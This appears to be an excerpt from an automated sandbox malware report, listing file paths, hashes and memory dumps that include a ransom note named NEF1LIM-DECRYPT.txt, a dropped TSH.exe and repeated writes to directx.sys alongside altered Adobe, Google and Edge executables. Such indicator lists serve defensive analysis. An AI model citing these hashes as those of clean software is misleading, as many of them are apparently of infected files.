| SHA512 | 5a1f7c44ce7f5036bffc18ebac39e2bf70e6f35fa252617d665b26448f4c4473adfa115467b7e2d9b7068823e448f74410cdcdfef1ac1c09021e051921787373 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE
| MD5 | 176436d406fd1aabebae353963b3ebcf |
| SHA1 | 9ffdfdb8cc832a0c6501c4c0e85b23a0f7eff57a |
| SHA256 | 2f947e3ca624ce7373080b4a3934e21644fb070a53feeaae442b15b849c2954f |
| SHA512 | a2d1a714e0c1e5463260c64048ba8fd5064cfa06d4a43d02fc04a30748102ff5ba86d20a08e611e200dc778e2b7b3ae808da48132a05a61aa09ac424a182a06a |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE
| MD5 | 12c29dd57aa69f45ddd2e47620e0a8d9 |
| SHA1 | ba297aa3fe237ca916257bc46370b360a2db2223 |
| SHA256 | 22a585c183e27b3c732028ff193733c2f9d03700a0e95e65c556b0592c43d880 |
| SHA512 | 255176cd1a88dfa2af3838769cc20dc7ad9d969344801f07b9ebb372c12cee3f47f2dba3559f391deab10650875cad245d9724acfa23a42b336bfa96559a5488 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE
| MD5 | 92dc0a5b61c98ac6ca3c9e09711e0a5d |
| SHA1 | f809f50cfdfbc469561bced921d0bad343a0d7b4 |
| SHA256 | 3e9da97a7106122245e77f13f3f3cc96c055d732ab841eb848d03ac25401c1bc |
| SHA512 | d9eefb19f82e0786d9be0dbe5e339d25473fb3a09682f40c6d190d4c320cca5556abb72b5d97c6b0da4f8faefdc6d39ac9d0415fdf94ebcc90ecdf2e513c6a31 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE
| MD5 | 8c753d6448183dea5269445738486e01 |
| SHA1 | ebbbdc0022ca7487cd6294714cd3fbcb70923af9 |
| SHA256 | 473eb551101caeaf2d18f811342e21de323c8dd19ed21011997716871defe997 |
| SHA512 | 4f6fddefc42455540448eac0b693a4847e21b68467486376a4186776bfe137337733d3075b7b87ed7dac532478dc9afc63883607ec8205df3f155fee64c7a9be |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE
| MD5 | 4ddc609ae13a777493f3eeda70a81d40 |
| SHA1 | 8957c390f9b2c136d37190e32bccae3ae671c80a |
| SHA256 | 16d65f2463658a72dba205dcaa18bc3d0bab4453e726233d68bc176e69db0950 |
| SHA512 | 9d7f90d1529cab20078c2690bf7bffab5a451a41d8993781effe807e619da0e7292f991da2f0c5c131b111d028b3e6084e5648c90816e74dfb664e7f78181bc5 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe
| MD5 | 5791075058b526842f4601c46abd59f5 |
| SHA1 | b2748f7542e2eebcd0353c3720d92bbffad8678f |
| SHA256 | 5c3ef3ec7594c040146e908014791dd15201ba58b4d70032770bb661b6a0e394 |
| SHA512 | 83e303971ed64019fde9e4ba6f6e889f8fb105088490dfa7dcf579a12baff20ef491f563d132d60c7b24a4fd3cac29bd9dc974571cd162000fae8fba4e0e54fb |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE
| MD5 | 9dfcdd1ab508b26917bb2461488d8605 |
| SHA1 | 4ba6342bcf4942ade05fb12db83da89dc8c56a21 |
| SHA256 | ecd5e94da88c653e4c34b6ab325e0aca8824247b290336f75c410caa16381bc5 |
| SHA512 | 1afc1b95f160333f1ff2fa14b3f22a28ae33850699c6b5498915a8b6bec1cfc40f33cb69583240aa9206bc2ea7ab14e05e071275b836502a92aa8c529fc1b137 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe
| MD5 | cce8964848413b49f18a44da9cb0a79b |
| SHA1 | 0b7452100d400acebb1c1887542f322a92cbd7ae |
| SHA256 | fe44ca8d5050932851aa54c23133277e66db939501af58e5aeb7b67ec1dde7b5 |
| SHA512 | bf8fc270229d46a083ced30da6637f3ca510b0ce44624a9b21ec6aacac81666dffd41855053a936aa9e8ea6e745a09b820b506ec7bf1173b6f1837828a35103d |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE
| MD5 | 09acdc5bbec5a47e8ae47f4a348541e2 |
| SHA1 | 658f64967b2a9372c1c0bdd59c6fb2a18301d891 |
| SHA256 | 1b5c715d71384f043843ea1785a6873a9f39d2daae112ccdeffcd88b10a3a403 |
| SHA512 | 3867bf98e1a0e253114a98b78b047b0d8282b5abf4aaf836f31cc0e26224e2a1b802c65df9d90dc7696a6dbcb9a8e4b900f1d1299e1b11e36f095ebaf8a2e5b8 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe
| MD5 | 576410de51e63c3b5442540c8fdacbee |
| SHA1 | 8de673b679e0fee6e460cbf4f21ab728e41e0973 |
| SHA256 | 3f00404dd591c2856e6f71bd78423ed47199902e0b85f228e6c4de72c59ddffe |
| SHA512 | f7761f3878775b30cc3d756fa122e74548dfc0a27e38fa4109e34a59a009df333d074bf14a227549ae347605f271be47984c55148685faac479aeb481f7191db |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE
| MD5 | 3b73078a714bf61d1c19ebc3afc0e454 |
| SHA1 | 9abeabd74613a2f533e2244c9ee6f967188e4e7e |
| SHA256 | ded54d1fcca07b6bff2bc3b9a1131eac29ff1f836e5d7a7c5c325ec5abe96e29 |
| SHA512 | 75959d4e8a7649c3268b551a2a378e6d27c0bfb03d2422ebeeb67b0a3f78c079473214057518930f2d72773ce79b106fd2d78405e8e3d8883459dcbb49c163c4 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe
| MD5 | 8ffc3bdf4a1903d9e28b99d1643fc9c7 |
| SHA1 | 919ba8594db0ae245a8abd80f9f3698826fc6fe5 |
| SHA256 | 8268d3fefe8ca96a25a73690d14bacf644170ab5e9e70d2f8eeb350a4c83f9f6 |
| SHA512 | 0b94ead97374d74eaee87e7614ddd3911d2cf66d4c49abbfd06b02c03e5dd56fd00993b4947e8a4bcd9d891fa39cab18cc6b61efc7d0812e91eb3aea9cd1a427 |
C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE
| MD5 | 40c8e5f4f7fb2fa4c6ed47e7f254a3cc |
| SHA1 | 5da20099194e003816c3fd46408b5e5ab934b424 |
| SHA256 | 2a28751ada21b17ca140ed3a03dccd29995b2ef702528eed1cc02bff0292f327 |
| SHA512 | 5e91bd9347df79eca484f6c5768930a191ffd679d5979b8c896f620c6f207c02f737782f0c6453e0973748c78bc9bc2cc537b27378f73a80dd254c2df9667ae3 |
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe
| MD5 | 5ded80b3298448f200875c533dc7f578 |
| SHA1 | fc366ef472dd3bfa49a0cf9f28bd2cfd4177afdd |
| SHA256 | ee2236d13bbde89936decef22282b8378ac56610b90749944baa3a690d7acb5b |
| SHA512 | a7dafb5d868b56d43e3eadfdb7deea44ad418e966ec9cbe073d13c5a2fedfe366faa5fbd796a84e3e1c1b9a408960ed2d2bcd179785c4b6c5a377a3a83105c42 |
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE
| MD5 | faf78e3f3cf0f2ae6db284279d0f6ff4 |
| SHA1 | 0d8e13ff68c65995e7c5c6496ce6c5efff1e1d5d |
| SHA256 | 9efa96e84b1ee98d2af2117a904d613b0da063278a8722da9a062ae81a32bf4b |
| SHA512 | dad369bf628a3de472ab51fa69a51c9ee92575b7c3c696b434cfe30fd57221171a20f28d2e3760cb1f28b526f278e760aedd861efa914eb7592219af087cd98e |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE
| MD5 | ee219cec7a1ffa818860d41a0fd52b50 |
| SHA1 | d97b1b7c64219ec43bec1275aebb0164b145b0b9 |
| SHA256 | 1ab69da787b51bb021a1908491cf65f80f9f991c27ce1bfaec101782812b2833 |
| SHA512 | 731b47ef8ca8a3e78d58144bd15f21b4fc91b245b8d9cfd48001a5613aa91c2203fb76f8d4297b2ee48485e264aaa8e7df1912e82d3ffe73dfc6592982cd6a61 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge.exe
| MD5 | 88bec53e56a6b3121e0574d1c663d067 |
| SHA1 | 681608f0cadf80ba96652b9c488516caf70e7b0f |
| SHA256 | c6fbfeeee15a2fe7302a80fd5e679cec3212f4eb1a92ef14dd7f19a19a107299 |
| SHA512 | c60926f095fb4bd4ddd351d61e412eca97246f8dce14c655c9a54741c078fcb1380730758ca4d35a84da968b4284c8787ab10dc3884adf5e5f8cba58db2adde3 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE
| MD5 | 674eddc440664b8b854bc397e67ee338 |
| SHA1 | af9d74243ee3ea5f88638172f592ed89bbbd7e0d |
| SHA256 | 20bbf92426732ff7269b4f2f89d404d5fee0fa6a20944004d2eeb3cc2d1fa457 |
| SHA512 | 5aced0e2235f113e323d6b28be74da5e4da4dc881629461df4644a52bccd717dc6d2632c40ed8190b3ad060b8b62c347757a0bbe82680d892114c1f0529146b7 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE
| MD5 | e4351f1658eab89bbd70beb15598cf1c |
| SHA1 | e18fbfaee18211fd9e58461145306f9bc4f459ea |
| SHA256 | 4c783822b873188a9ced8bd4888e1736e3d4f51f6b3b7a62675b0dc85277e0eb |
| SHA512 | 57dbc6418011bcac298e122990b14ed1461c53b5f41cb4986d1d3bbbb516c764a7c205fc4da3722399fdb9122f28e4ec98f39d2af80d4b6a64d7bd7944d1c218 |
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe
| MD5 | 892cf4fc5398e07bf652c50ef2aa3b88 |
| SHA1 | c399e55756b23938057a0ecae597bd9dbe481866 |
| SHA256 | e2262c798729169f697e6c30e5211cde604fd8b14769311ff4ea81abba8c2781 |
| SHA512 | f16a9e4b1150098c5936ec6107c36d47246dafd5a43e9f4ad9a31ecab69cc789c768691fa23a1440fae7f6e93e8e62566b5c86f7ed6bb4cfe26368149ea8c167 |
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe
| MD5 | 9a8d683f9f884ddd9160a5912ca06995 |
| SHA1 | 98dc8682a0c44727ee039298665f5d95b057c854 |
| SHA256 | 5e2e22ead49ce9cc11141dbeebbe5b93a530c966695d8efc2083f00e6be53423 |
| SHA512 | 6aecf8c5cb5796d6879f8643e20c653f58bad70820896b0019c39623604d5b3c8a4420562ab051c6685edce60aa068d9c2dbb4413a7b16c6d01a9ac10dc22c12 |
C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE
| MD5 | d9186b6dd347f1cf59349b6fc87f0a98 |
| SHA1 | 6700d12be4bd504c4c2a67e17eea8568416edf93 |
| SHA256 | a892284c97c8888a589ea84f88852238b8cd97cc1f4af85b93b5c5264f5c40d4 |
| SHA512 | a29cc26028a68b0145cb20ec353a4406ec86962ff8c3630c96e0627639cf76e0ea1723b7b44592ea4f126c4a48d85d92f930294ae97f72ecc95e3a752a475087 |
C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE
| MD5 | 87bb2253f977fc3576a01e5cbb61f423 |
| SHA1 | 5129844b3d8af03e8570a3afcdc5816964ed8ba4 |
| SHA256 | 3fc32edf3f9ab889c2cdf225a446da1e12a7168a7a56165efe5e9744d172d604 |
| SHA512 | 7cfd38ceb52b986054a68a781e01c3f99e92227f884a4401eb9fbc72f4c140fd32a552b4a102bedf9576e6a0da216bc10ce29241f1418acb39aeb2503cb8d703 |
C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE
| MD5 | cdc455fa95578320bd27e0d89a7c9108 |
| SHA1 | 60cde78a74e4943f349f1999be3b6fc3c19ab268 |
| SHA256 | d7f214dc55857c3576675279261a0ee1881f7ddee4755bb0b9e7566fc0f425a9 |
| SHA512 | 35f3741538bd59f6c744bcad6f348f4eb6ea1ee542f9780daa29de5dbb2d772b01fe4774fb1c2c7199a349488be309ceedd562ceb5f1bdcdd563036b301dcd9f |
C:\PROGRA~2\Google\Update\DISABL~1.EXE
| MD5 | 7429ce42ac211cd3aa986faad186cedd |
| SHA1 | b61a57f0f99cfd702be0fbafcb77e9f911223fac |
| SHA256 | d608c05409ac4bd05d8e0702fcf66dfae5f4f38cbae13406842fa5504f4d616f |
| SHA512 | ee4456877d6d881d9904013aabecb9f2daf6fc0ec7a7c9251e77396b66a7f5a577fe8544e64e2bb7464db429db56a3fe47c183a81d40cc869d01be573ab5e4c1 |
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe
| MD5 | 452c3ce70edba3c6e358fad9fb47eb4c |
| SHA1 | d24ea3b642f385a666159ef4c39714bec2b08636 |
| SHA256 | da73b6e071788372702104b9c72b6697e84e7c75e248e964996700b77c6b6f1c |
| SHA512 | fe8a0b9b1386d6931dc7b646d0dd99c3d1b44bd40698b33077e7eeba877b53e5cb39ff2aa0f6919ccab62953a674577bc1b2516d9cadc0c051009b2083a08085 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe
| MD5 | 7e37d766247059f57b1749cc981dae75 |
| SHA1 | 3c97628e79d241dac9c9275ea4137f97c215a142 |
| SHA256 | 4b681840018519bd755191705a1e0330557a33943f165f80a01fda3641db4cd3 |
| SHA512 | a924960c22a5246024ace05c76b54f6db3be3ea6bbb08b4c12fad5379dba7b5c4bb0f5deece37b01f908ef876dbf616dc808d5d2f734867698a24f49c5c1e3f2 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe
| MD5 | b9c69481857d7550c5ebd77cc50a1d84 |
| SHA1 | a2e18198fd96975f9f3206330af9a933e336ddc1 |
| SHA256 | 3f3063f7da14b31417aa8dbc0e5242a50a29f7948cd1288e0647d9f927129123 |
| SHA512 | cb1c02d0aa19210835ab584bdd49fbb9c446bd793d4c0e68f0a0f04f6a5c7e0f595009d544120e71a641f9776c39b17d7c0c5fea76392581f6aa094cd6fb4647 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\BHO\ie_to_edge_stub.exe
| MD5 | 23622b7d65653e1dd46db1d10c52d933 |
| SHA1 | 5278e3311ef9adac97bcd572ef4466161deb921d |
| SHA256 | 6e872df59c1f0f474f5f2e1bacd84b8570b08195fe5615a7293eecf540f88505 |
| SHA512 | 8b2a0c9f71baa78fbe30c82a2f530faf106adabe366200555891af3ea5b52ca327f05e8f53c55d73d94c08fc60433218235b638b0ada1617ee57668087966b26 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 269e4c2c9d845b3d021557aadb73e0eb |
| SHA1 | 92ebc7a34d5df0d210544b9176c712ff47f7288a |
| SHA256 | 9768ef23def4b35bf2161bf4caaaf355eb6e26aac46e5c49990d86173aa45e49 |
| SHA512 | e602f8f2948ae4fe356688df3a22eefe9e8bd2fae2f77aa7ab27ab2b20af72a54c7050fd6fb7f9ff279aed7348ea4ee7051b5a0dde0d1510247f1b4cb6961148 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedgewebview2.exe
| MD5 | fccf74c2b9b3e8af2814e8b6493eeb93 |
| SHA1 | 74ea75ba393e718e802e84060c74780d5e38bae5 |
| SHA256 | 8c2ffa56077b4d79db8118b544f095faf4803dbe5676af3f0d9ac52b15d73724 |
| SHA512 | 909f02d7f14e08078275f492ae5df978d6e81e57d15e95083d8bc23631aa6d720088eefdbe60173db6dca3485d00c599937b42262f2c8e395a4fce84222c9dcb |
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\Installer\setup.exe
| MD5 | 4df2f346ca3852b5dff45c058d22eab3 |
| SHA1 | 7724a7e7cb09d79a44104e694d06999c225e5f2a |
| SHA256 | 59c94097f063a245ebce78f2e63354bb94f12f3faf10a7800381e20a249d0132 |
| SHA512 | 746dcad9a5febe85202061583d9c241bee8c1375fa01735dcc200050fe685f9e04ba97f4ccc86802bafe5b0b9f56534adb5f4262a5db7b468e8014a3a70af735 |
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\identity_helper.exe
| MD5 | 105512023f579c681bbf55f4f88a2ded |
| SHA1 | 2b7e3fb82461924e2afa09cf778da484605cb855 |
| SHA256 | bbdb39a2dec157d2a571101338907d3ce6b6b4122ee077644cd1285ccb0515b0 |
| SHA512 | 0aeacf1bd617722c29dcd763208c20e89d90cff4c43a478f1292ef0964a3172fcc22cc2b1850ec68981c4760674e68f804bf3bba2155d9bbf9c7aa38f7394985 |
C:\PROGRA~2\MICROS~1\Edge\Application\pwahelper.exe
| MD5 | ae233c9a94ac29078a9b84a0e2f21d0e |
| SHA1 | 74352f8a9f95dac8d4149592f2ca5cafa3f22df5 |
| SHA256 | d351a76537354ee30c5c229ce5ad7684befc6aeac30dbf8c38c03f7780c9ab87 |
| SHA512 | 4985561bd596b002849f3c840b04b5443385f3eb6ba3e1016090a6623b61b0143c4cc928f2b5aa95a70fda8363359ebbdcdd89a5521e90e93aa1c17903ac4109 |
C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe
| MD5 | a504bdfc2f71c8040cb5b6c743d32f34 |
| SHA1 | e693d0844f6a6c7d82a70e289f99c62a216dd13a |
| SHA256 | 8ba67958788de5da6de9288f1bb6d2b73f57cc88534359a9a627063e86fcb076 |
| SHA512 | 0ac11251e930ffb1ca965c7f584fcd64d9a2432e248b6d98847e10b67c80482a0591f663f046b7d6add34160bc2deedaf89313a5a6f2cccfa395264c193c4f89 |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe
| MD5 | 40309a97594ecfed9e8cd0368b51f002 |
| SHA1 | 8a1ca73a3ee107c1f172877a21f2e8b6a5c30f54 |
| SHA256 | 48e26052483e4981461c09644924f28464019919cc740cece6069adb71c3be48 |
| SHA512 | 359d44547d0cb2c5fa403cc2e1e860bd502db6066a6e09871a047edfaa4ee9449415cbe6ce32a13eb3276fa7f13bd4397572a4439989b080aa4c3ff1c8adcbca |
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_pwa_launcher.exe
| MD5 | 34d0a4d388738301876a910823dfcb8a |
| SHA1 | 46849a3f21432aceb23b403ce4a3625a45d1b7d2 |
| SHA256 | dbb4397b616325e5484d4d26836d4e1da826e83be51b1ebf59c758bf5bd58a34 |
| SHA512 | ed65ecca79d99824d289bba7e77dd714087ad34536aaf95648b31d93d28d5ecb8b42c776332651c98ffb02c18a9b9e792f0293ded46051ff4def050efeb95c3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d9fd8f4dfe01ed17c0160d2725992615 |
| SHA1 | 10d9b0233a1058a2dcfc0a36536810d6473ad9a2 |
| SHA256 | bee45e1f3f4cc09ab72aea611c0e5139e4f423ddf10e6be33dc8e14f75653ec9 |
| SHA512 | 74403023b73c742b42ba8b875027b3e02857d7c8f46076525c54eafe872635ead90f53f6d7ef23b0ba521775a1643f9221641fda02f34178370ff5c9f908c3a0 |
memory/2592-3028-0x00007FFB70800000-0x00007FFB70834000-memory.dmp
memory/2592-3027-0x00007FF6A5510000-0x00007FF6A5608000-memory.dmp
memory/2592-3029-0x00007FFB60D90000-0x00007FFB61046000-memory.dmp
memory/2592-3030-0x00007FFB5DEC0000-0x00007FFB5EF70000-memory.dmp
memory/3160-3031-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3032-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2084-3033-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3560-3034-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\300d3ba8-9fd1-4a35-ad86-1aba741d2230.tmp
| MD5 | 901060b70cde76414e6faf7753de4031 |
| SHA1 | 5c05ebf3dab261415d9d3bfa7aa52c59922f96f3 |
| SHA256 | adb5207b6dad19edc483ac965d631077c81af799946b527831e21c315de9c720 |
| SHA512 | 6310e76531bed2e89813b86a53d52a889818126e0f3ce23c1921a934ab9d51511743df53823bbbf9642b36c3c843a6df351c7fa7bf88caf3c4b379e0db07cdde |
memory/3160-3046-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3047-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | 659a3e3bd68e465d6c1298bcdfc4ff6b |
| SHA1 | 66a6f41f6530c4024acb000229c14fa0755eef52 |
| SHA256 | 8f669c94b99ddd078d0628bc47ed7e62ec9227617a34643dae2b46cc8cf81bc7 |
| SHA512 | 12b101361cbe96bbd9dad9ab9b146be1255f4d8da79e89428b5402c8042fb817ffa7e03370cc567d32136b1deed341d017a0724304d8d1a2a73c0c5efc5e127d |
memory/3160-3055-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3056-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2084-3059-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3560-3060-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3692-3062-0x0000000000400000-0x000000000083D000-memory.dmp
memory/3892-3061-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 843201cde73e09d21ce92415c87644e7 |
| SHA1 | a1cc0cc99d0487be97c524ad5fcd82466b41d3b5 |
| SHA256 | dc72d9118e2362aeb127c533e38183bc1ffbfc778e4863f4a9cd5bb6f0a4baa4 |
| SHA512 | 99b1f22cb18f4a842b9accdd4d2eb00e138f3f4c87c10b3b56605af2c1c59ea4389650dc93d97262f2d29660523b7fdf8e60cfe4f971c55bf4f8aeac9b5f0a32 |
memory/3160-3074-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3892-3076-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3077-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3160-3078-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Windows\directx.sys
| MD5 | adb221a2cf618daac4c46bd0d5d4ae0c |
| SHA1 | a329c34de11d5a0cf420d4590488c31bf698dab0 |
| SHA256 | baa4dd591a99137254e74ad08916ee2c0f404839f01752d8e6106602dac7c90e |
| SHA512 | e7125dc7aa1d3eda86be2b3a861ab06e873e636321d9a17b84860d45b37c69772a39066b83b064bb87d8f5fa15d81ac3d750f0eab9fa1016d8538be836c9bbf8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8c26526f8f39e8a1fca0e2724e9716ed |
| SHA1 | 1a779eb69c1f97c8b934d2a834ad5d4bf2decb81 |
| SHA256 | 987434bf1c758221eea2cbff7dbe15e43c9242ced92f7e95813181ece218da2c |
| SHA512 | 3ec4d2732268dccc2686c40bc32c4d83ef383f56ab5c5dfea6c17ecdad3dff8846f713fb3ca6634beb3599ccc9a5d1078f646175a1393ad8c95f17c6de69d2e8 |
memory/664-3097-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4304-3101-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b5ad5caaaee00cb8cf445427975ae66c |
| SHA1 | dcde6527290a326e048f9c3a85280d3fa71e1e22 |
| SHA256 | b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8 |
| SHA512 | 92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | d222b77a61527f2c177b0869e7babc24 |
| SHA1 | 3f23acb984307a4aeba41ebbb70439c97ad1f268 |
| SHA256 | 80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747 |
| SHA512 | d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff |
memory/4304-3115-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3160-3116-0x0000000000400000-0x000000000041B000-memory.dmp
memory/664-3118-0x0000000000400000-0x000000000041B000-memory.dmp
memory/3160-3119-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e723b40a0509234884e89c352c4a79b7 |
| SHA1 | a1fe1fc864313eb118b97368be75f4973bf2f14f |
| SHA256 | d3695748070c33f84921133d4314f7d5c1b73ae30105f75bac9b559d93416ef0 |
| SHA512 | cf3e32399a11dde231e69af1bea4bd1342ff12b90de9af5f7fba59b7b47f343380e011aba9e13ea0cdf387eb3055dbd40bf3c6cd9cdb2d4b15a403f68171f8ea |
memory/980-3138-0x0000000000400000-0x000000000041B000-memory.dmp
C:\ProgramData\QQOFCC\TSH.exe
| MD5 | d60cf802e4316bfaf8ca1964b2f1c769 |
| SHA1 | e7ed7367a4f107002a1e3b4b7786a7dc3d6c78c6 |
| SHA256 | 26f91ae0fb21c5966c18bf6eb3c0f7e0358c46d54c97c580ed41b03b5f8443b3 |
| SHA512 | 82ba16d17d01c85c6ac51338a6a10881832eb40636400eb5191d44365f83e5bac2b408748008c37760bdf8367d6a9ae7cb75f08bad44e1e8a4ed8b625dffcfae |
C:\Windows\directx.sys
| MD5 | 80b834412fd107d3b575f9b3e66ca1f2 |
| SHA1 | e2464128d56d4b9b3c68ecaa36483534a601b68a |
| SHA256 | e8e6d94a8971fa22fedbdf31f3601059e9220556ee39e0503508da969c5000b3 |
| SHA512 | 680fed241ca5af5fdca09ca947d0bdefa6cfa7b54bcbbeeb1aad208ba568bf8efff226f566638d842e2b2a01a1bae4439b7306a104a76e0baa8c4b4ba12205a9 |
memory/1120-3150-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | be7e7aa5130614d4f1ff581baf01d66e |
| SHA1 | 75576262a88e2e8ac6404ea27e9dd84bb1a5267d |
| SHA256 | e5eb3c371046f4be2f598c9f7d8253d254c686cbe610b9016b12b23627c9bcc5 |
| SHA512 | 836d432bfb9a05c72231e9dceec47b8a2a746ff79b12dc6426fe6395c81580f319e0f86668eba4d2ae21f4ad3f85547a65f848fe2abc6f66e62a76c354285bd9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 546d0f46d4f8fe200667b9da637820ec |
| SHA1 | 68642b540f621ce8859fdeb710dad00e4ee40790 |
| SHA256 | 42091670e86234565a250cbd28e17a4a6f86fec2a0ca99ede392babf731abaf9 |
| SHA512 | 60badb2606075a2b1f5261b4b3d6740d54edba0d3cbfa09da2ca941de5477753ecac3173c8522082633dc578d14ae79ba4c2d8ebaa2b47090d460fcf8ff133a7 |
C:\Windows\directx.sys
| MD5 | a6d2895e6295c22e30a941cfa2a8b740 |
| SHA1 | 9b2336696c81a4dad5e664f10fe35f9c4bf8f95b |
| SHA256 | f8413c8a3843371ee75e422bb635041a9f89517116d3113d6a17733506ce95c9 |
| SHA512 | a219fa66e3ee92df29269fd4820c909bc91e68247bdc80cfca0173b8dfd0761bbcc82a26461268f7602f2df0e9d6a5341ce574641f031fac41b7739aaf5520b4 |
C:\Users\NEF1LIM-DECRYPT.txt
| MD5 | 26024bfff1079296a378717d3d1cb7b0 |
| SHA1 | 26dd37b88849066fb84c3a46401fd754972f9e2f |
| SHA256 | b777912f6a8177b2c58cb448da68c0eb6b2d6ab30dcc3ea0ca7e5895f40d7887 |
| SHA512 | 69ca9d20b9322f772caf9698f2bd42cd1451369c2692042e9003a4c57b60708d385e59f6e17fe11f33b52eba48f1f96b3b84f9458c9df27b9707c76981432f84 |
memory/4120-3604-0x0000000000400000-0x000000000041B000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | db263671c858de731f33008421b40097 |
| SHA1 | b2e62b003dff9bff1b723e7e16a570100038e61f |
| SHA256 | 6053223c6394ea957deb14d5f62aef29403cb50dd8b3471726d425a4b836914b |
| SHA512 | f934ded409a0e6d0cac649be817314f62d3313e3448af589f81ea2ba336e60896850e65034f70f68c40f03f29aef621f5cf875d19bb2955595b2ff2ddd4f8e31 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir3012_1420145593\d31b67e9-b462-46b3-8a1d-16de8ee1a6f0.tmp
| MD5 | da75bb05d10acc967eecaac040d3d733 |
| SHA1 | 95c08e067df713af8992db113f7e9aec84f17181 |
| SHA256 | 33ae9b8f06dc777bb1a65a6ba6c3f2a01b25cd1afc291426b46d1df27ea6e7e2 |
| SHA512 | 56533de53872f023809a20d1ea8532cdc2260d40b05c5a7012c8e61576ff092f006a197f759c92c6b8c429eeec4bb542073b491ddcfd5b22cd4ecbe1a8a7c6ef |
